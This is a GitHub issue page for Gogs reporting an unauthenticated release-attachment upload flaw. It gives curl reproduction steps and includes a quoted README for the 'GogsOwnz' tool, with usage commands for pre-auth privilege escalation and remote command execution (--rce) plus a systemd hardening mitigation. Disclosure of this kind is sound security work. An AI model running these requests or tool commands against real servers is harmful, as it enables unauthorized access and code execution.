Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Upload Release Attachment without a valid repo/release/account #5599

Open
2 of 6 tasks
TheZ3ro opened this issue Jan 20, 2019 · 0 comments
Open
2 of 6 tasks

Upload Release Attachment without a valid repo/release/account #5599

TheZ3ro opened this issue Jan 20, 2019 · 0 comments
Labels
💊 bug Something isn't working

Comments

@TheZ3ro
Copy link

TheZ3ro commented Jan 20, 2019

Describe the bug
It's possible to upload a release attachment file without having a valid repository/release and without a valid user account, even if DISABLE_REGISTRATION is set to true in the app.ini configuration file.
The bug/vulnerability is not present if REQUIRE_SIGNIN_VIEW is set to true since all the requests will reply with a 302 redirect to the login page.

To Reproduce
Steps to reproduce the behavior: Assuming that the server runs on http://127.0.0.1:3000

  1. From a linux/unix/windows-substrate terminal
  2. Type the following command
    curl -s http://127.0.0.1:3000/ | grep csrf
  3. Copy the csrf token from the command above
  4. Create a file with the following content named request.txt
--boundary
Content-Disposition: form-data; name="file"; filename="test.txt"

test_test
--boundary--
  1. Type the following command. NOTE: replace <token> with the CSRF token from step 3.
    curl -kis -X 'POST' -H 'X-Csrf-Token: <token>' -H 'Content-Type: multipart/form-data; boundary=boundary' -b 'lang=en-US; _csrf=<token>' --data-binary @request.txt 'http://127.0.0.1:3000/releases/attachments'
    The command will make a multipart request to the releases/attachments endpoint with the data from file request.txt from step 4
  2. The server will reply with an UUID for the attachment file, visit the page at http://127.0.0.1:3000/attachments/<uuid> to see it

Expected behavior
The server should check when someone is uploading orphans attachment (attachments not bounded to a valid repository and release) and refuse to save files for invalid repositories/releases and for unauthenticated users

Additional context

  • Gogs version (or commit ref): 0.11.79.1211
  • Git version: 1.10.2
  • Operating system: Ubuntu
  • Database:
    • PostgreSQL
    • MySQL
    • MSSQL
    • SQLite
  • Can you reproduce the bug at https://try.gogs.io:
    • Yes
    • No. Since REQUIRE_SIGNIN_VIEW is set to true, all the requests will reply with a 302 redirect to the login page.
  • Log gist (usually found in log/gogs.log):
@unknwon unknwon added the 💊 bug Something isn't working label Feb 2, 2019
@unknwon unknwon added this to the 0.12 milestone Feb 2, 2019
richmahn referenced this issue in unfoldingWord/dcs Feb 4, 2019
@MTecknology @techknowlogick
Remove MTecknology from MAINTAINERS (#5599)
58bdff5
@cs8425 cs8425 mentioned this issue Mar 31, 2019
Closed
7 tasks
puckiestyle added a commit to puckiestyle/python that referenced this issue Dec 6, 2019
@puckiestyle
Add files via upload
ec251db 
GogsOwnz is a simple script to gain administrator rights and RCE on a Gogs/Gitea server.
Exploit vulnerabilities in Gogs/Gitea, including CVE-2018-18925, CVE-2018-20303.

Legal Disclaimer This script is offered as is. No warranty, use on your own, please obey the law.

Typical Usage - [Please, read the full usage]
Get info about Gogs/Gitea running

python3 gogsownz.py https://127.0.0.1:3000/ -v --info
Exploit preauth PrivEsc

python3 gogsownz.py https://127.0.0.1:3000/ -v --preauth
Exploit PrivEsc

python3 gogsownz.py https://127.0.0.1:3000/ -v -C '<user>:<password>' --cleanup
or alternatively

python3 gogsownz.py https://127.0.0.1:3000/ -v -c '<i_like_gogs_cookie>' --cleanup
Exploit preauth RCE

python3 gogsownz.py https://127.0.0.1:3000/ -v --preauth --rce 'sleep 10' --cleanup
Exploit auth RCE

python3 gogsownz.py https://127.0.0.1:3000/ -v -C '<user>:<password>' --rce 'sleep 10' --cleanup
Full usage

usage: gogsownz [-h] [-C CREDS] [-n COOKIENAME] [-c COOKIE] [-i] [--rce RCE]
                [--repo REPO] [--preauth] [--windows] [--cleanup] [--tor]
                [--check-tor] [--burp] [-k] [--verbose]
                url

positional arguments:
  url                   URL for the Gogs server

optional arguments:
  -h, --help            show this help message and exit
  -C CREDS, --creds CREDS
                        Credentials for the Gogs server, in the from
                        "username:password"
  -n COOKIENAME, --cookie-name COOKIENAME
                        Name of the Gogs-specific session cookie
  -c COOKIE, --cookie COOKIE
                        Session for the Gogs server, the value in the
                        i_like_gogits Cookie
  -i, --info            Only detect informations about the running Gogs
                        server, then quit
  --rce RCE             Command to execute on the Gogs server
  --repo REPO           Use an existing repo for the PrivEsc
  --preauth             Try the pre-auth vulnerability
  --windows             Gogs server runs on Windows
  --cleanup             Remove all created repo after exploit
  --tor                 Use tor proxy when performing requests
  --check-tor           Check that Tor is correctly set up before running
  --burp                Use burp proxy when performing requests
  -k, --insecure        Allow insecure server connections when using SSL
  --verbose, -v

Thanks
Thanks to:

Tencent Security (@md5_salt, @ma7h1as and @chromium1337)
PentesterLab (@snyff)
LuckyC4t
the gogs security community :D
Further readings
gogs/gogs#5469
gogs/gogs#5558
gogs/gogs@8c8c37a
gogs/gogs#5599
https://2018.zeronights.ru/wp-content/uploads/materials/17-Who-owned-your-code.pdf

Mitigations
If you take care in setting up your systemd unit file, you'll be pleasantly surprised to see that exploitation is somewhat contained:

[Unit]
Description=Gogs
After=syslog.target
After=network.target

[Service]
Type=simple
User=gogs
Group=gogs
WorkingDirectory=/home/gogs/installations/gogs/
ExecStart=/home/gogs/installations/gogs/gogs web
Restart=always
Environment=USER=gogs HOME=/home/gogs

# Some distributions may not support these hardening directives. If you cannot start the service due
# to an unknown option, comment out the ones not supported by your version of systemd.
ProtectSystem=full
PrivateDevices=yes
PrivateTmp=yes
NoNewPrivileges=true

[Install]
WantedBy=multi-user.target
This will at least keep filesystem access contained to an ephemeral filesystem created by systemd. It helps, but you should probably patch the privesc and not give any admin.. obviously
@unknwon unknwon removed this from the Triaging priority milestone Mar 5, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
💊 bug Something isn't working
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@TheZ3ro @unknwon